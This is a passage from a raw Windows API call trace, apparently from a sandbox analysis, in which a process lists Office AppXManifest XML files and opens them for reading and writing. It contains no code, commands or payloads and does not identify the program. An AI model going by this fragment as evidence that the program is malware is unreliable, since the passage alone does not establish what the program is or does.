Flags=0x0, Size=0x70) returned 0x76278 [0099.253] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89470 [0099.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0099.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88d30 [0099.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89470 | out: hHeap=0x20000) returned 1 [0099.254] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.254] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.254] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.254] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88d30 | out: hHeap=0x20000) returned 1 [0099.254] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0099.254] AreFileApisANSI () returned 1 [0099.254] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0099.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.254] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.254] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.254] AreFileApisANSI () returned 1 [0099.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.254] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 105 [0099.254] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0099.255] GetFileType (hFile=0x360) returned 0x1 [0099.255] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.255] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.255] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.255] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.255] CloseHandle (hObject=0x360) returned 1 [0099.255] AreFileApisANSI () returned 1 [0099.255] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.255] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.256] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 105 [0099.256] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0099.256] GetFileType (hFile=0x360) returned 0x1 [0099.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.256] CloseHandle (hObject=0x360) returned 1 [0099.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0099.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0099.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0099.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0099.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0099.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0099.256] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0099.256] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0099.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0099.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0099.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0099.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0099.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0099.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0099.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0099.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0099.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0099.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0099.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.257] AreFileApisANSI () returned 1 [0099.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.257] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.257] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76110, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml") returned 105 [0099.257] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0409-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8396fbd3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8396fbd3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84391d75, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed)) returned 1 [0099.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.257] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.257] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.258] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.258] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84214453, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", cAlternateFileName="APCB35~1.XML")) returned 1 [0099.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b30 [0099.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0099.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0099.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d0d0 [0099.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0099.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0099.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0099.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0099.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351d0 [0099.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351d0 | out: hHeap=0x20000) returned 1 [0099.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0099.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0099.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0099.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0099.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0099.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89728 [0099.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.258] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89388 [0099.258] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89728 | out: hHeap=0x20000) returned 1 [0099.258] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.258] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.258] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.258] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89388 | out: hHeap=0x20000) returned 1 [0099.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0099.259] AreFileApisANSI () returned 1 [0099.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0099.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0099.259] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.259] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0099.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.259] AreFileApisANSI () returned 1 [0099.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76020, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.259] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76020, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 105 [0099.259] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0099.259] GetFileType (hFile=0x360) returned 0x1 [0099.259] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.260] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0099.260] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0099.260] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0099.260] CloseHandle (hObject=0x360) returned 1 [0099.260] AreFileApisANSI () returned 1 [0099.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76020, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.260] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76020, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 105 [0099.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0115-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0099.260] GetFileType (hFile=0x360) returned 0x1 [0099.260] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0099.261] CloseHandle (hObject=0x360) returned 1 [0099.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0099.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0099.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0099.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0099.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0099.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0099.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0099.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0099.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0099.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0099.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0099.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0099.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0099.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0099.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0099.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0099.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.261] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.261] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0099.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0099.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0099.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0099.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0099.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0099.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0099.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0099.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0099.262] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0099.262] AreFileApisANSI () returned 1 [0099.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76020, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0099.262] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0099.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76020, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml") returned 105 